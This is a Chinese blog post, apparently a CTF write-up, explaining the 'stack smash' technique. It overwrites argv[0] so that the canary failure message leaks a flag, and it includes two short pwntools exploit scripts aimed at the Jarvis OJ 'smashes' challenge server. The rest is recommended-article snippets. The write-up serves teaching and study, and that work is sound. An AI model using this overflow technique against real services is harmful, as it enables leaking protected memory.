花式栈溢出值stack smash

最新推荐文章于 2023-08-10 11:30:00 发布
最新推荐文章于 2023-08-10 11:30:00 发布
阅读量279 收藏
点赞数
分类专栏: 栈溢出 文章标签: 花式栈溢出 stack smash jarvis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45097188/article/details/103038056
版权

花式栈溢出值stack smash

原理:

在程序加了 canary 保护之后,如果我们读取的 buffer 覆盖了对应的值时,程序就会报错,而一般来说我们并不会关心报错信息。而 stack smash 技巧则就是利用打印这一信息的程序来得到我们想要的内容。这是因为在程序启动 canary 保护之后,如果发现 canary 被修改的话,程序就会执行 __stack_chk_fail 函数来打印 argv[0] 指针所指向的字符串,正常情况下,这个指针指向了程序名。其代码如下

void __attribute__ ((noreturn)) __stack_chk_fail (void)
{
  __fortify_fail ("stack smashing detected");
}
void __attribute__ ((noreturn)) internal_function __fortify_fail (const char *msg)
{
  /* The loop is added only to keep gcc happy.  */
  while (1)
    __libc_message (2, "*** %s ***: %s terminated\n",
                    msg, __libc_argv[0] ?: "<unknown>");
}

所以说如果我们利用栈溢出覆盖 argv[0] 为我们想要输出的字符串的地址,那么在 __fortify_fail 函数中就会输出我们想要的信息。

jarvise oj —smashes

在main函数中我们发现的存在栈溢出的get()函数

在这里插入图片描述

同时我们又发现了类似flag的字符串,当然不是真正的flag

在这里插入图片描述

我们又发现了存在stack smash的函数,查看保护机制后发现也开启了canary,这就完全符合了我们的技巧,我们可以利用stack smash解题了

在这里插入图片描述

__小知识:当ELF文件比较小的时候,他的不同区段可能会被多次映射,也就是说flag可能有备份,gdb查找一下 __

在这里插入图片描述

我们发现了不可修改的flag地址。

在get函数输入的地方下断点,查看栈结构。找到偏移

在这里插入图片描述

exp:

计算偏移的:

from pwn import*
p=remote('pwn.jarvisoj.com',9877)
p.recvline("name?")
new_addr=0x400d21
payload='A'*0x218+p64(new_addr)
p.sendline(payload)
p.interactive()

既然argv[0]一定在栈上,那么覆盖足够长的栈空间均为flag的值 即可

from pwn import*
p=remote('pwn.jarvisoj.com',9877)
p.recvline("name?")
new_addr=0x400d21
payload=p64(new_addr)*100
p.sendline(payload)
p.interactive()

21
payload=p64(new_addr)*100
p.sendline(payload)
p.interactive()
Eternalstay
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
花式栈溢出技巧----Stack smash
qq_42192672的博客
10-17 1381
学习文献:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/others/#stack-smash 以前遇见过一次这种情况,但是是不求甚解的完成了,这次慢慢分析一下原理 栈保护和NX字段都开启了,这里科普一下栈保护,我喜欢叫它金丝雀,链接:https://blog.csdn.net/qq_42192672/article...
栈溢出进阶 小白笔记
小白垃圾笔记2
04-05 751
具有canary保护的程序在canary检查不同时,回报错,然后打印出文件名,文件名好像是在运行的时候保存进去的。当canary被改后程序会调用 _stack_chk_fail@plt然后调用__fortify__fail源代码__stack_chk_fail函数,它会调用__fortify_fail函数,__fortify_fail函数有一个参数,这个参数就是我们程序崩溃的时候打印出来的数据。下边是__fortify_fail 函数的源代码。
好好说话之Stack smash
hollk’s blog
07-28 1928
Stack smash 我们之前一直没有做过关于canary保护的题,那么这个Stack smash就是绕过canary保护的技术。在程序加载了canary保护之后如果我们是在覆盖缓冲区的时候就会连带着覆盖了canary保护的cookie,这个时候程序就会报错。但是这个技术并不在乎是否报错,而是在乎报错的内容。stack smash技巧就是利用打印这一信息的程序来得到我们想要的内容。这是因为在程序启动canary保护之后,如果发现canary被修改的话就会执__stack_chk_fail函数来打印argv
防止Stack smash的技术
baron-周贺贺-代码改变世界ctw
12-08 525
Stack smash attack的示例 部署 Canary 漏洞缓解措施 ShadowCallStack PAC:Pointer authentication和BTI:Branch target instructions介绍
【PWN · Stack Smash】[2021 鹤城杯]easyecho
Mr_Fmnwon的博客
07-30 676
Canary保护,是在栈上插入一段随机数;进入函数后,也就是call完后会有push ebp,mov ebp,esp,最后来个mov esp。canary保护特殊在上述操作后会再加一个canary。最后函数leave ret前会检测一次,canary与原先是否相同来判断是否被栈溢出覆盖返回地址了。然而,Smash这种方法,恰好是利用Canary保护机制,修改相关函数参数,泄露信息。详细介绍Smash的文章不在少数,本文主要聚焦于做出题目,因此重点(但非详细)阐述我所理解的重点部分。
栈求表达式的Stack-Expr.zip
最新发布
12-23
本主题主要讨论如何利用栈结构来求解表达式的。我们将通过分析给定的C语言源代码文件“栈求表达式的.c”来深入理解这个过程。 首先,我们来看表达式求的基本步骤: 1. **预处理**:对输入的表达式进行预处理...
JavaScript实现栈结构Stack过程详解
10-15
JavaScript中的栈结构(Stack)是一种线性数据结构,它的特点是后进先出(LIFO)。在实际编程中,栈常用于函数调用栈、递归等场景。在JavaScript中实现栈,可以通过数组来模拟栈的基本操作,如push、pop、peek、...
Stack-栈实例
10-23
在计算机科学中,栈常被用于解决各种问题,如表达式求、递归、内存管理等。下面我们将深入探讨栈的基本概念、静态栈与链表栈的实现方式,以及它们在实际应用中的例子。 首先,栈的基本操作包括: 1. **压栈**...
DPDK技术峰会:腾讯的开源协议栈F-Stack.pdf
12-04
DPDK技术峰会PPT讲稿 DPDK开发者大会讲稿 文档讨论了腾讯的开源协议栈F-Stack,设计原则、架构、主要组件、性能及其在腾讯公司内的发展历史,F-Stack, a Full User Space Network Service on DPDK – Haigong Wang @...
C++栈(stack)的模板类实现代码
08-30
4. `stackTop()`:如果栈非空,返回栈顶元素的。 5. `printStack()`:遍历链表并打印所有元素。 6. `counts()`:返回栈中元素的数量。 7. `isEmpty()`:如果`cnts`为零,则返回`true`,表示栈为空,否则返回`false...
栈溢出技巧(下)
m0_59598029的博客
08-10 284
canary这个被称作金丝雀(“canary”),指的是矿工曾利用金丝雀来确认是否有气体泄漏,如果金丝雀因为气体泄漏而中毒死亡,可以给矿工预警。在brop中也提到过,通过爆破的办法去进行绕过canary保护,因为canary的在每次程序运行时都是不同的,所以这需要一定的条件:fork的子进程不变,题目中很难遇到,所以我们可以使用stacksmash的方法进行泄漏内容。
花式栈溢出技巧之stack smash
至臻求学,胸怀云月
03-01 1684
原理 在程序添加了canary保护后,如果我们读取的buffer覆盖了对应的时,程序就会报错,而我们一般并不会关心报错信息。 但stack smash技巧则是利用打印这一信息的程序得到我们想要的内容。 这是因为程序在启动canary保护之后,如果发现canary被修改的话,程序就会执行__stack_chk_fail函数来打印argv[0]指针所指向的字符串,正常情况下,这个指针指向程序名。 ...
[BUUCTF]wdb2018_guess——Stack smash技巧
zyxx_wjc的博客
07-20 410
stack smash
报错stack smashing detected ***:terminated
weixin_44864066的博客
09-14 1万+
运行程序时出现 stack smashing detected :terminated //检测到堆栈粉碎:已终止 或者buffer overflow detected :terminated //检测到缓冲区溢出:已终止 可能是数组越界,我遇到的是自己定义了一个512字节的数组,却把1000多字节的结构体数据塞进去,使用了memcpy,真是令人头皮发麻的操作,直接gg,所以还是先定义个大点的数组,结构体里的数据接口定下来了在看情况缩小数组大小。 ...
171119 Pwn-StackSmash
whklhhhh的博客
11-24 975
1625-5 王子昂 总结《2017年11月19日》 【连续第415天总结】 A. pwn-StackSmash B.原理当程序加了Cannary来保护时,栈溢出会使得程序异常终止并输出错误信息 StackSmash就是利用这个错误信息进行任意地址读取的 报错函数为__stack_chk_fail,代码如下:void __attribute__ ((noreturn)) __stack_c
stack smashing detected,程序段错误
热门推荐
linengeir的专栏
12-15 5万+
今天在写程序的时候,突然出现"stack smashing detected"的错误.用经常用的调试方法,GDB,语句输出等均不能定位问题的出处. 先说解决方案: 出现这个问题的原因是:在程序函数中,数组越界访问,在程序运行时没出现问题,但当函数return的时候就会出现上面的错误. 解决办法是:gdb, where命令定位到出错的函数,然后检查函数中数组的长度,使其满足程序的要求. 参考
stack溢出 ** stack smashing detected ***: ./a.out terminated
iteye_572的博客
05-10 1804
该类错误是修改了返回指针,一般是由于 1. 数组越界赋。(数组没有边界检查)int a[8]; a[8],a[9],a[-1]。。都能正常编译,连接,运行时可能出错。 2.使用 strcpy等不安全(不带长度检测的函数),char a[1], char *b="aaa"; strcpy(a,b);   局部变量(函数内的变量)存在栈中,应为栈是先下(低地址)生长的,故 函数返回指针 要...
[译文]Smashing The Stack For Fun And Profit
新博客请访问- http://oliveryang.net
07-23 4352
 [译文]Smashing The Stack For Fun And Profit2000年12月20原作 by Aleph Onealeph1@underground.org翻译 xuzq@chinasafer.comwww.chinasafer.com践踏堆栈[C语言编程] n. 在许多C语言的实现中,有可能通过写入例程中所声明的数组的结尾部分来破坏可执行的堆栈.所谓践踏堆栈使用的代
其它栈溢出技巧
听鬼哥说故事
08-29 5931
其它栈溢出技巧
jvm虚拟机栈(JVM Stack)
07-12
JVM虚拟机栈(JVM Stack)是Java虚拟机为每个线程分配的内存区域之一。它用于存储线程执行方法时的局部变量、操作数栈、方法参数以及方法调用和返回的相关信息。 JVM栈采用堆栈数据结构,每个线程都拥有自己独立的栈。每当一个线程调用一个方法时,JVM会为该线程在栈上创建一个新的栈帧(Stack Frame),用于存储该方法的相关信息。 栈帧由三个主要部分组成: 1. 局部变量区(Local Variable Array):用于存储方法中定义的局部变量。 2. 操作数栈(Operand Stack):用于执行方法过程中保存和操作方法的操作数。 3. 栈帧数据区:用于存储方法的返回地址、异常处理信息等。 JVM栈是一个动态增长和收缩的数据结构,它的容量可以根据程序的需求进行调整。如果线程请求的栈深度超过了JVM所允许的最大深度,就会抛出StackOverflowError异常。而如果JVM栈无法动态扩展时,就会抛出OutOfMemoryError异常。 JVM栈与Java堆(Heap)不同,Java堆用于存储对象实例和数组,而JVM栈主要用于支持方法的执行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值